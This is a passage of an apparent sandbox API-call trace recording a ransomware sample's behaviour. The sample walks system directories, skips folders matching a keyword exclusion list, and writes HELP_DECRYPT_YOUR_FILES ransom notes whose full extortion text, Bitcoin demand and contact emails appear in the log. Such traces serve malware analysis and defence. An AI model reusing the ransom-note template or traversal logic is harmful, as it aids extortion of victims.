	[0168.818] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\autologger\\*.*", lpSrch="cookies") returned 0x0
	[0168.818] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.818] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\autologger\\*.*", lpSrch="programdata") returned 0x0
	[0168.818] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0168.819] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0168.819] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc088dfed, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x7e24396d, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0168.819] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0168.819] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x2000, ftCreationTime.dwLowDateTime=0xc088dfed, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xc088dfed, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xa37065bb, ftLastWriteTime.dwHighDateTime=0x1d976a2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AutoLogger-Diagtrack-Listener.etl", cAlternateFileName="AUTOLO~1.ETL")) returned 1
	[0168.819] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e24396d, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7e24396d, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7e269a60, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0168.819] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e24396d, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7e24396d, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7e24396d, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0168.819] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e24396d, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7e24396d, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7e24396d, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0
	[0168.819] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 1
	[0168.820] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 0
	[0168.820] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e15e998, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7e15e998, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7e184a89, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0168.820] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e13871d, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7e13871d, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7e15e998, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0168.820] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ShutdownLogger", cAlternateFileName="SHUTDO~1")) returned 1
	[0168.820] lstrcmpW (lpString1="ShutdownLogger", lpString2="..") returned 1
	[0168.820] lstrcmpW (lpString1="ShutdownLogger", lpString2=".") returned 1
	[0168.820] lstrcpyW (in: lpString1=0x18a87c, lpString2="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs"
	[0168.821] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\"
	[0168.821] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\", lpString2="ShutdownLogger" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\ShutdownLogger") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\ShutdownLogger"
	[0168.821] lstrcpyW (in: lpString1=0x189d74, lpString2="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\ShutdownLogger" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\ShutdownLogger") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\ShutdownLogger"
	[0168.821] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\ShutdownLogger", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\ShutdownLogger\\") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\ShutdownLogger\\"
	[0168.821] lstrcpyW (in: lpString1=0x189964, lpString2="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\ShutdownLogger\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\ShutdownLogger\\") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\ShutdownLogger\\"
	[0168.821] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\ShutdownLogger\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\ShutdownLogger\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\ShutdownLogger\\*.*"
	[0168.821] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\ShutdownLogger\\*.*" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\shutdownlogger\\*.*"), lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x371b45ea, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98f0
	[0168.995] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\ShutdownLogger\\*.*") returned 65
	[0168.995] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0168.995] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\ShutdownLogger\\*.*", cchLength=0x41 | out: lpsz="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\shutdownlogger\\*.*") returned 0x41
	[0168.995] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.995] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\shutdownlogger\\*.*", lpSrch="windows") returned 0x0
	[0168.995] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.996] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\shutdownlogger\\*.*", lpSrch="boot") returned 0x0
	[0168.996] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.996] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\shutdownlogger\\*.*", lpSrch="system volume information") returned 0x0
	[0168.996] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.996] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\shutdownlogger\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0168.996] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.996] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\shutdownlogger\\*.*", lpSrch="temp") returned 0x0
	[0168.996] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.997] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\shutdownlogger\\*.*", lpSrch="program files") returned 0x0
	[0168.997] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.997] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\shutdownlogger\\*.*", lpSrch="program files (x86)") returned 0x0
	[0168.997] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.997] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\shutdownlogger\\*.*", lpSrch="appdata") returned 0x0
	[0168.997] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.997] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\shutdownlogger\\*.*", lpSrch="application data") returned 0x0
	[0168.997] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.998] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\shutdownlogger\\*.*", lpSrch="winnt") returned 0x0
	[0168.998] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.998] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\shutdownlogger\\*.*", lpSrch="tmp") returned 0x0
	[0168.998] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.998] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\shutdownlogger\\*.*", lpSrch="cache") returned 0x0
	[0168.998] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.998] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\shutdownlogger\\*.*", lpSrch="temporary internet files") returned 0x0
	[0168.998] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.999] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\shutdownlogger\\*.*", lpSrch="webcache") returned 0x0
	[0168.999] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.999] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\shutdownlogger\\*.*", lpSrch="inetcache") returned 0x0
	[0168.999] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.999] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\shutdownlogger\\*.*", lpSrch="nvidia") returned 0x0
	[0168.999] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.999] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\shutdownlogger\\*.*", lpSrch="packages") returned 0x0
	[0168.999] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.000] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\shutdownlogger\\*.*", lpSrch="cookies") returned 0x0
	[0169.000] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.000] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\shutdownlogger\\*.*", lpSrch="programdata") returned 0x0
	[0169.000] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x371b45ea, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0169.000] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x371b45ea, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0
	[0169.000] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 1
	[0169.000] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 0
	[0169.001] lstrcpyW (in: lpString1=0x189d74, lpString2="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\ShutdownLogger" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\ShutdownLogger") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\ShutdownLogger"
	[0169.001] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\ShutdownLogger", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\ShutdownLogger\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\ShutdownLogger\\*.*"
	[0169.001] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0169.001] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0169.001] wsprintfW (in: param_1=0x189660, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\ShutdownLogger\\HELP_DECRYPT_YOUR_FILES.TXT") returned 89
	[0169.002] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\ShutdownLogger\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\shutdownlogger\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0169.002] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0169.003] WriteFile (in: hFile=0x390, lpBuffer=0x188a18*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18993c, lpOverlapped=0x0 | out: lpBuffer=0x188a18*, lpNumberOfBytesWritten=0x18993c*=0xc46, lpOverlapped=0x0) returned 1
	[0169.006] CloseHandle (hObject=0x390) returned 1
	[0169.006] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1889e8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1889e8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0169.007] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0169.007] GetUserNameA (in: lpBuffer=0x1888cc, pcbBuffer=0x1889e4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1889e4) returned 1
	[0169.008] wsprintfW (in: param_1=0x189868, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0169.008] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\ShutdownLogger\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\shutdownlogger\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0169.008] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0169.008] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0169.009] WriteFile (in: hFile=0x390, lpBuffer=0x189868*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x189944, lpOverlapped=0x0 | out: lpBuffer=0x189868*, lpNumberOfBytesWritten=0x189944*=0x30, lpOverlapped=0x0) returned 1
	[0169.009] CloseHandle (hObject=0x390) returned 1
	[0169.010] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0169.011] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0169.011] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0169.011] wsprintfW (in: param_1=0x189620, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\ShutdownLogger\\HELP_DECRYPT_YOUR_FILES.HTML") returned 90
	[0169.011] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\ShutdownLogger\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\shutdownlogger\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0169.011] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0169.011] WriteFile (in: hFile=0x390, lpBuffer=0x188e14*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x189938, lpOverlapped=0x0 | out: lpBuffer=0x188e14*, lpNumberOfBytesWritten=0x189938*=0x808, lpOverlapped=0x0) returned 1
	[0169.015] CloseHandle (hObject=0x390) returned 1
	[0169.015] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0169.015] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x188dfc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x188dfc*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0169.016] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0169.016] GetUserNameA (in: lpBuffer=0x188ce0, pcbBuffer=0x188df8 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x188df8) returned 1
	[0169.017] wsprintfA (in: param_1=0x189828, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0169.017] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\ShutdownLogger\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\shutdownlogger\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0169.017] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0169.017] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0169.018] WriteFile (in: hFile=0x390, lpBuffer=0x189828*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x189940, lpOverlapped=0x0 | out: lpBuffer=0x189828*, lpNumberOfBytesWritten=0x189940*=0x43, lpOverlapped=0x0) returned 1
	[0169.018] CloseHandle (hObject=0x390) returned 1
	[0169.018] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\ShutdownLogger\\*.*" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\shutdownlogger\\*.*"), lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x371b45ea, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x7e4597ae, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98f0
	[0169.019] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\ShutdownLogger\\*.*") returned 65
	[0169.019] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0169.019] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\ShutdownLogger\\*.*", cchLength=0x41 | out: lpsz="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\shutdownlogger\\*.*") returned 0x41
	[0169.019] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.019] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\shutdownlogger\\*.*", lpSrch="windows") returned 0x0
	[0169.019] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.019] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\shutdownlogger\\*.*", lpSrch="boot") returned 0x0
	[0169.020] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.020] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\shutdownlogger\\*.*", lpSrch="system volume information") returned 0x0
	[0169.020] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.020] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\shutdownlogger\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0169.020] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.020] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\shutdownlogger\\*.*", lpSrch="temp") returned 0x0
	[0169.020] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.021] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\shutdownlogger\\*.*", lpSrch="program files") returned 0x0
	[0169.021] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.021] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\shutdownlogger\\*.*", lpSrch="program files (x86)") returned 0x0
	[0169.021] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
